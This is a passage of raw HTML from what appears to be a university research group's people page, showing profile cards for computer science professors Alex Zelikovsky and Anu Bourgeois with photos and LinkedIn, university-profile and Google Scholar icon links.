45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=KzNVJwIAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c28-outer\">\n            <div data-colibri-id=\"182-c28\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c28 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c29\" class=\"d-block style-973 style-local-182-c29 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-zelikovsky.jpeg\" class=\"wp-image-704 style-973-image style-local-182-c29-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c29-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c30\" class=\"h-global-transition-all h-heading style-974 style-local-182-c30 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c30\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Alex Zelikovsky</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c31\" class=\"h-text h-text-component style-975 style-local-182-c31 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Distinguished University Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c32\" class=\"h-text h-text-component style-976 style-local-182-c32 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c33\" class=\"style-977 style-local-182-c33 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/alex-zelikovsky-48a2795/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/alex-zelikovsky/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=UzCRNJwAAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 11.719-70.313c0-23.438-2.93-46.875-5.859-70.313-5.859-23.438-8.789-46.875-17.578-73.242-8.789-23.438-17.578-46.875-32.227-70.313-11.719-20.508-26.367-41.016-43.945-61.523s-38.086-35.156-58.594-43.945c-17.578-11.719-41.016-14.648-64.453-14.648-26.367 0-49.805 2.93-70.313 14.648-17.578 8.789-35.156 23.438-49.805 41.016-14.648 20.508-23.438 38.086-32.227 61.523-5.859 23.438-8.789 49.805-8.789 76.172 0 23.438 0 46.875 5.859 70.313 2.93 20.508 8.789 43.945 14.648 70.313 8.789 23.438 17.578 43.945 32.227 67.383 11.719 20.508 26.367 38.086 43.945 58.594 17.578 17.578 38.086 32.227 58.594 41.016s41.016 14.648 64.453 14.648c26.367 0 49.805-5.859 70.313-14.648 17.578-5.859 35.156-20.508 49.805-38.086z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-972-outer style-local-182-c34-outer\">\n            <div data-colibri-id=\"182-c34\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-972 style-local-182-c34 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c35\" class=\"d-block style-973 style-local-182-c35 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-bourgeois.jpeg\" class=\"wp-image-696 style-973-image style-local-182-c35-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-973-frameImage style-local-182-c35-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c36\" class=\"h-global-transition-all h-heading style-974 style-local-182-c36 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-974 style-local-182-c36\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Anu Bourgeois</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c37\" class=\"h-text h-text-component style-975 style-local-182-c37 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Professor</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c38\" class=\"h-text h-text-component style-976 style-local-182-c38 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c39\" class=\"style-977 style-local-182-c39 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/anu-bourgeois-09b7b32b/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://cas.gsu.edu/profile/anu-bourgeois/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Font Awesome (https://fontawesome.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"external-link\" viewBox=\"0 0 1792 1896.0833\">\n                              <path d=\"M1408 928v320q0 119-84.5 203.5T1120 1536H288q-119 0-203.5-84.5T0 1248V416q0-119 84.5-203.5T288 128h704q14 0 23 9t9 23v64q0 14-9 23t-23 9H288q-66 0-113 47t-47 113v832q0 66 47 113t113 47h832q66 0 113-47t47-113V928q0-14 9-23t23-9h64q14 0 23 9t9 23zm384-864v512q0 26-19 45t-45 19-45-19l-176-176-652 652q-10 10-23 10t-23-10L695 983q-10-10-10-23t10-23l652-652-176-176q-19-19-19-45t19-45 45-19h512q26 0 45 19t19 45z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://scholar.google.com/citations?user=qsAUgQ8AAAAJ&amp;hl=en\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1341.797 166.992c14.648 0 23.438 5.859 23.438 11.719 2.93 8.789 2.93 17.578 2.93 29.297v503.906c0 11.719-5.859 20.508-11.719 29.297-8.789 8.789-17.578 11.719-29.297 11.719h-17.578c-11.719 0-20.508-5.859-29.297-11.719-8.789-8.789-11.719-17.578-11.719-29.297v-503.906c0-11.719 0-20.508 0-29.297 2.93-5.859 8.789-11.719 23.438-11.719v-67.383l-219.727 181.641c2.93 2.93 2.93 5.859 5.859 5.859 0 2.93 2.93 2.93 2.93 5.859 8.789 17.578 17.578 38.086 23.438 58.594 2.93 20.508 5.859 46.875 5.859 73.242 0 20.508 0 38.086-2.93 55.664s-8.789 38.086-14.648 52.734c-8.789 14.648-14.648 29.297-23.438 43.945-8.789 11.719-17.578 23.438-26.367 32.227-8.789 11.719-20.508 20.508-29.297 29.297s-20.508 17.578-29.297 26.367c-8.789 8.789-17.578 17.578-26.367 26.367s-14.648 17.578-23.438 26.367c-5.859 8.789-11.719 17.578-14.648 26.367-2.93 11.719-2.93 20.508-2.93 29.297 0 11.719 0 20.508 5.859 29.297 2.93 8.789 8.789 20.508 20.508 29.297 8.789 8.789 17.578 20.508 29.297 29.297 8.789 8.789 20.508 20.508 35.156 29.297 11.719 8.789 26.367 17.578 38.086 29.297 11.719 8.789 26.367 20.508 38.086 32.227s23.438 23.438 35.156 38.086c11.719 17.578 20.508 32.227 29.297 49.805s14.648 38.086 17.578 55.664c5.859 20.508 8.789 41.016 8.789 61.523 0 29.297-2.93 55.664-11.719 82.031-5.859 26.367-17.578 49.805-32.227 70.313-14.648 23.438-32.227 43.945-49.805 61.523-20.508 20.508-41.016 35.156-61.523 49.805-26.367 11.719-49.805 26.367-73.242 35.156-26.367 8.789-49.805 17.578-79.102 23.438-23.438 5.859-49.805 11.719-79.102 14.648-26.367 2.93-52.734 5.859-79.102 5.859-14.648 0-32.227 0-49.805-2.93-14.648 0-32.227-2.93-49.805-5.859-14.648-2.93-32.227-5.859-49.805-8.789-17.578-5.859-35.156-11.719-49.805-17.578-17.578-5.859-35.156-11.719-49.805-20.508s-29.297-17.578-41.016-29.297c-14.648-8.789-26.367-20.508-35.156-32.227-11.719-11.719-20.508-26.367-29.297-41.016s-14.648-32.227-20.508-49.805c-2.93-14.648-5.859-32.227-5.859-52.734 0-23.438 2.93-43.945 8.789-64.453s14.648-41.016 29.297-61.523c11.719-17.578 26.367-35.156 43.945-52.734 14.648-14.648 35.156-29.297 55.664-41.016 17.578-11.719 38.086-20.508 61.523-32.227 20.508-8.789 46.875-14.648 76.172-23.438 29.297-5.859 58.594-11.719 90.82-14.648 32.227-5.859 70.313-8.789 108.398-11.719-17.578-23.438-29.297-43.945-38.086-64.453s-14.648-41.016-14.648-58.594c0-11.719 2.93-23.438 5.859-35.156s5.859-23.438 11.719-38.086c-8.789 0-17.578 2.93-29.297 2.93-8.789 0-17.578 0-26.367 0-43.945 0-79.102-5.859-114.258-17.578-35.156-14.648-67.383-32.227-93.75-61.523-29.297-26.367-49.805-58.594-64.453-90.82s-20.508-70.313-20.508-111.328c0-2.93 0-8.789 0-11.719 0-5.859 0-8.789 0-11.719h-339.844l506.836-439.453h834.961l-76.172 58.594v108.398zM922.852 1037.109c0-2.93-5.859-5.859-11.719-8.789-5.859-5.859-11.719-8.789-20.508-17.578-8.789-5.859-17.578-11.719-23.438-17.578-2.93-2.93-5.859-5.859-8.789-5.859s-8.789 0-14.648 0c-5.859 0-14.648-2.93-23.438-2.93-20.508 0-38.086 2.93-55.664 2.93-20.508 2.93-38.086 5.859-55.664 8.789s-38.086 8.789-55.664 14.648c-17.578 5.859-35.156 11.719-52.734 17.578-17.578 8.789-32.227 17.578-49.805 29.297-11.719 11.719-26.367 23.438-35.156 38.086-11.719 14.648-20.508 32.227-26.367 49.805s-8.789 35.156-8.789 55.664c0 20.508 2.93 38.086 8.789 55.664 2.93 14.648 11.719 32.227 23.438 46.875 8.789 14.648 20.508 29.297 32.227 38.086 14.648 11.719 29.297 23.438 43.945 29.297 14.648 8.789 29.297 17.578 46.875 23.438s32.227 11.719 49.805 14.648c20.508 5.859 38.086 8.789 52.734 8.789 20.508 2.93 38.086 2.93 52.734 2.93 38.086 0 70.313-2.93 99.609-11.719 32.227-5.859 58.594-17.578 84.961-35.156s43.945-35.156 55.664-61.523c14.648-26.367 20.508-52.734 20.508-87.891 0-5.859 0-11.719-2.93-20.508 0-5.859 0-11.719-2.93-20.508s-5.859-14.648-5.859-20.508c-2.93-5.859-5.859-11.719-5.859-14.648-2.93-5.859-5.859-11.719-8.789-17.578s-8.789-11.719-14.648-17.578c-5.859-8.789-8.789-11.719-14.648-17.578s-8.789-8.789-11.719-11.719c-2.93-2.93-5.859-5.859-11.719-11.719-2.93-5.859-11.719-11.719-17.578-17.578-8.789-8.789-14.648-11.719-20.508-17.578-5.859 2.93-8.789 0-11.719 0zM911.133 641.602c11.719-14.648 23.438-35.156 32.227-58.594s11.719-46.875 